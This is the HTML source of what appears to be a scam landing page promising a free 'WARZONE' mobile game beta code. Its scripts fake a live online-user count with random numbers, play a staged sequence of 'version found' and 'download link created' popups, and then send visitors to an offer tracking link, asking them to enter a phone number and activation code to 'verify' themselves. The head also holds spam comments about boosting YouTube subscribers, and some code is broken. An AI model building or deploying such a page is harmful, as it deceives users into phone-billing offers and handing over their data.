﻿
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
		<title> WARZONE</title>
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
		<meta name="description" content="WARZONE Mobile
" />
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		<link rel="icon" type="image/png" href="img/favicon.png" />
		<meta name="theme-color" content="#000000">
		<!-- Open Graph Meta Tags-->
  site is shared on social networks -->
		<meta property="og:description" content="Apk Beast • Free App Tweaks & Mods" /> <!-- Website موقع 

مشتركين يوتيوب مجانا.
طريقه زياده مشتركين اليوتيوب بضغطه زر 
زيادة عدد المشاهدات والمشاركين في قناتك على اليوتيوب بطريقة شرعية و مضمونة
برنامج زيادة مشتركين ومشاهدات قنوات اليوتيوب رائع وامن تابع للاخير زيادة عدد المشتركين على قناتك في اليوتيوب n your site is shared on social networks -->
	<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-148218009-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-148218009-1');
</script>
		<meta property="og:type" content="website" />
		<meta property="og:url" content="www..com" /> <!-- Your Website URL --><!-- Twitter Meta -->
		<!-- Icons -->
		<link rel="stylesheet" href="css/icon-font.min.css">
        <link rel="stylesheet" href="css/all2.css">
		<!-- Google Fonts -->
		<link href="https://fonts.googleapis.com/css?family=Poppins:300,400,700,900&amp;display=swap" rel="stylesheet">
		<!-- CSS -->
		<link href="css/bootstrap.min.css" rel="stylesheet" />
		<link href="css/animate.css" rel="stylesheet" />
		<link href="css/style.css" rel="stylesheet" />
		<link href="css/sweetalert2.css" rel="stylesheet" />
		<script src="js/vanillatoasts.js"></script>
		<script src="js/live.js"></script>
		<link href="css/vanillatoasts.css" rel="stylesheet" />

		<style>
		input[type="value"]{
			font-size: 32px;
		}
		input[type="text"]{
		-moz-appearance: none;
		-webkit-appearance: none;
		-ms-appearance: none;
		appearance: none;
		background: #e7e7e7;
		border: 0;
		border-radius: 10px;
		color: #222222;
		display: block;
		outline: 0;
		padding: 0 1em;
		text-decoration: none;
		width: 100%;
		}
		input::-moz-focus-inner {
		border: 0;
		padding: 0;
		}
		input {
		color: #222222;
		font-size: 30px;
		font-weight: 600;
		letter-spacing: 0.025em;
		line-height: 1.65;
		}
		#spiner {
			font-size: 2.6em;
			display: block;
			text-align: center;
			margin: 20px auto;
			color: #8400ff;
		}
		.hide {
			display: none;
		}
		.swal2-popup {
			border-radius: 30px;
		}
		.float{
			position:fixed;
			width:55px;
			height:55px;
			bottom:40px;
			right:40px;
			background-color:#8400ff;
			color:#FFF;
			border-radius:50px;
			text-align:center;
			box-shadow: 2px 2px 3px #999;
		}
		.float:hover {
			color: #000;
			background-color: #fff;
		}
		.my-float{
			margin-top:19px;
		}
		strike {
			color: red;
		}
		</style>
	</head>
	<body onload="create()">
		<div id="bg"></div>
		<div class="overlay-pattern"></div>
		<div class="overlay"></div>
		<section class="app-download-section">
			<div class="container">
				<div class="app-download-wrapper animated flipInX">
					<div class="app-icon-wrapper">
						<div class="app-icon-inner-wrapper">
							<img src="img/favicon.png" class="app-icon-img img-fluid" />
						</div>
					</div>
					<div class="app-download-content">
						<div class="app-download-content-header">
							<h1><span>WARZONE</span> •  get your free beta code now•</h1>
							<span>
</span>
						</div>
						<div class="app-download-status">
							<div class="status-row row-first animated bounceIn animation-delay-700">
								<span class="status-label">Status:</span>
								<span id="Status" class="status-dynamic">Online</span>
							</div>
							<div class="status-row row-second odd animated bounceIn animation-delay-900">
								<span class="status-label">Last Update:</span>
								<span id="date" class="status-dynamic"></span>
							</div>
							<div class="status-row row-last animated bounceIn animation-delay-80000">
								<span class="status-label">Online Users:</span>
								<span id="online-count" class="status-dynamic"></span>
	</div>
						</div>						<div id="control">
						
							<div class="app-download-main animated bounceIn">
								<div class="button-wrapper">
									<div id="b-1" onclick="nexT();playAu()" class="button animated pulse infinite"><span>Get the game now</span></div>
								</div>
								<div style="margin-top: 30px;">
								</div>
							</div>
						</div>
						<div id="show" class="hide">
							<div class="app-download-main animated bounceIn">
									<p class="app-download-intro-text">Your Username</p>
								    <form action="javascript:void(0);"name="Form">
										<input type="text" name="usernameInput" value=""required />
									</form>
									<br>
								<p class="app-download-intro-text">Select the operating system</p>
								<div class="field-wrapper platform-field-wrapper">
									<div id="devices">
									<div class="row small-margin">
										<div class="col small-padding">
											
												
												
											</div>
										</div>
										<div class="col small-padding">
						
														
										</div>
									</div>
									</div>
								</div>
						<p class="app-download-intro-text"></p>
						<div id="currency">
								<div class="row small-margin">
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-1">
												<img src="img/subscribers.png">
												<span> IOS <br></span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="img/subscribers.png">
												<span>Android<br></span>
											</div>
										</div>
										<div class="col small-padding">
																</div>
										</div>
										<div class="col small-padding">
																			<img 
												
											</div>
										</div>
										<div class="button-wrapper">
												<div id="b-2" onclick="playAu(); nexT1()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Press Here</span></div>
										</div>
								</div>
								</div>
						</div>
						</div>
						<div id="verify" class="hide">
								<div class="app-download-main animated bounceIn">
									<div class="app-download-content-header">
							        <span>The last step to get the update </span></div>
                                                                 <span>

In the last step, press CHECK NOW and select any offer to verify that you are a real person, enter the phone number and activate the mobile code and activate the code that reached you The last step to get the update Now click on the captchaon enter the phone number and activate the mobile code and activate the code that reached you The last step to get the update Now click on the captcha </span></div> 
									<p>The final step to get the update 

Click on the captcha now"

 </p>
									<div id="spiner" class="fas fa-spinner fa-spin"></div>
									<div class="app-download-content-header">
                                    <span>the rest of the time: </span>
                                    </div>
                                    <p id="time" style=" font-weight: bold;"></p>
									<div class="button-wrapper">
										<a href=" https://www.onemortrk.pics/?sl=5574091-c7738&data1=Track1&data2=Track2&tag={External_ID_from_traffic_source}&website={subID}&placement={sub_subID} "><div id="b-1" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>CHECK NOWu</span></div></a>
										</div>
								</div>
						</div>
						</div>
						</div>
			</div>
		</section>
		<footer>
			<div class="container">
				<div class="footer-content">
					
				</div>
			</div>
		</footer>
		<div class="X650d"></div>
		<audio id="myAudio">
			<source src="sounds/click.html" type="audio/ogg">
			<source src="sounds/click-2.html" type="audio/mpeg">
		</audio>
		<audio id="myAu">
			<source src="sounds/choose.html" type="audio/ogg">
			<source src="sounds/choose-2.html" type="audio/mpeg">
		</audio>
		<audio id="myAA">
			<source src="sounds/success.html" type="audio/ogg">
			<source src="sounds/success-2.html" type="audio/mpeg">
		</audio>
		<audio id="myerror">
			<source src="sounds/error.html" type="audio/ogg">
			<source src="sounds/error-2.html" type="audio/mpeg">
		</audio>

	</body>
	<!-- JS -->
	<script>
		function random(min,max)
			{
				return Math.floor(Math.random()*(max-min+1)+min);
			}

			var initial = random(300, 400);
			var count = initial;

			setInterval(function() {
				var variation = random(-5,5);

				count += variation
				document.getElementById("online-count").innerHTML = count;

			}, 1000)
		</script>
		<script>
			var d = new Date();
			document.getElementById("date").innerHTML = d.toDateString();
		</script>
		<script>
		var z = document.getElementById("myAA")
        function nexT() {
        let timerInterval
          Swal.fire({
            timer: 5000,
            imageUrl: 'https://upload.wikimedia.org/wikipedia/commons/c/c7/Loading_2.gif',
            imageAlt: 'Loading',
			title: 'Loading',
            showConfirmButton: false,
            onClose: () => {
              clearInterval(timerInterval)
            }

          }).then(function() {
			var x = document.getElementById("control");
			  if (x.style.display === "none") {
				x.style.display = "block";
			  } else {
					x.style.display = "none";
				}
			z.play();
			var element = document.getElementById("show");
			element.classList.remove("hide");
			Swal.fire({
			type: 'success',
			title: 'Your request has been added successfully',
			showConfirmButton: false,
			timer: 3000,
			onClose: () => {
              clearInterval(timerInterval)
            }
			})
			})
        }
		function nexT1() {
		let username = document.forms["Form"]["usernameInput"].value;
		if (username== null || username == "") {
      alert("Please put your name");
    } else {
		let timerInterval
          Swal.fire({
            timer: 5000,
            imageUrl: 'https://englishpiece.com/LoaderIcon.gif',
			imageAlt: 'moment please',
			title: 'Search by version',
            showConfirmButton: false,
            onClose: () => {
              clearInterval(timerInterval)
            }

          }).then(function() {
			z.play();
			Swal.fire({
			type: 'success',
			title: 'version found',
			showConfirmButton: false,
			timer: 3000,
			onClose: () => {
              clearInterval(timerInterval)
            }
			}).then(function() {
				Swal.fire({
				timer: 5000,
				imageUrl: 'https://englishpiece.com/LoaderIcon.gif',
				imageAlt: 'Loading',
				title: 'get it now wait',
				showConfirmButton: false,
				onClose: () => {
				clearInterval(timerInterval)
				}
				}).then (function(){
					z.play();
					Swal.fire({
					type: 'success',
					title: 'Download link created',
					showConfirmButton: false,
					timer: 3000,
					onClose: () => {
					clearInterval(timerInterval)
					}
                      }).then(function() {
						Swal.fire({
						timer: 5000,
						imageUrl: 'https://englishpiece.com/LoaderIcon.gif',
						imageAlt: 'Loading',
						title: 'Loading',
						showConfirmButton: false,
						onClose: () => {
						clearInterval(timerInterval)
						}
						}).then(function() {
							b.play();
							Swal.fire({
							type: 'error',
							title: 'The last step, press and enter your phone number and activate the code that will reach you',
							showConfirmButton: false,
							timer: 3000,
							onClose: () => {
							clearInterval(timerInterval)
							}
							}).then(function(){
								var element = document.getElementById("show");
								element.classList.add("hide");
								var element1 = document.getElementById("verify");
								element1.classList.remove("hide");
							})
						})
					})
				})
			})
		})
	}
        }
		</script>
      <script>
          // Add active class to the current button (highlight it)
          var header = document.getElementById("devices");
          var btns = header.getElementsByClassName("platform-item");
          for (var i = 0; i < btns.length; i++) {
            btns[i].addEventListener("click", function() {
            var current = document.getElementsByClassName("active");
            if (current.length > 0) {
              current[0].className = current[0].className.replace(" active", "");
            }
            this.className += " active";
            });
          }
		</script>
		<script>
					// Add active class to the current button (highlight it)
					var header = document.getElementById("currency");
					var btns = header.getElementsByClassName("platform-item1");
					for (var i = 0; i < btns.length; i++) {
					  btns[i].addEventListener("click", function() {
					  var current = document.getElementsByClassName("active1");
					  if (current.length > 0) {
						current[0].className = current[0].className.replace(" active1", "");
					  }
					  this.className += " active1";
					  });
					}
		</script>
		<script>
					// Add active class to the current button (highlight it)
					var header = document.getElementById("test");
					var btns = header.getElementsByClassName("platform-item2");
					for (var i = 0; i < btns.length; i++) {
					  btns[i].addEventListener("click", function() {
					  var current = document.getElementsByClassName("active2");
					  if (current.length > 0) {
						current[0].className = current[0].className.replace(" active2", "");
					  }
					  this.className += " active2";
					  });
					}
		</script>
		<script>
			var x = document.getElementById("myAudio");
			var y = document.getElementById("myAu")
			var z = document.getElementById("myAA")
			var b = document.getElementById("myerror")
			function playAu() {
			  x.play();
			}
			function playA() {
			  y.play();
			}
			function playAA() {
			  z.play();
			}
			function playerror() {
			  b.play();
			}
			</script>
			<script>
function startTimer(duration, display) {
    var timer = duration, minutes, seconds;
    setInterval(function () {
        الدقائق = parseInt(timer / 60, 10);
        ثواني = parseInt(timer % 60, 10);

        minutes = minutes < 10 ? "0" + minutes : minutes;
        seconds = seconds < 10 ? "0" + seconds : seconds;

        display.textContent = minutes + " minutes and " + seconds+ " seconds";

        if (--timer < 0) {
             display.textContent = "   ein paar Sekunden... " ;
        }
    }, 1000);
}

window.onload = function () {
    var fiveMinutes = 60 * 6,
        display = document.querySelector('#time');
    startTimer(fiveMinutes, display);
};
</script>
		<script src="js/jquery.min.html"></script>
		<script src="js/bootstrap.min.js"></script>
		<script src="js/sweetalert2.js"></script>

</html>
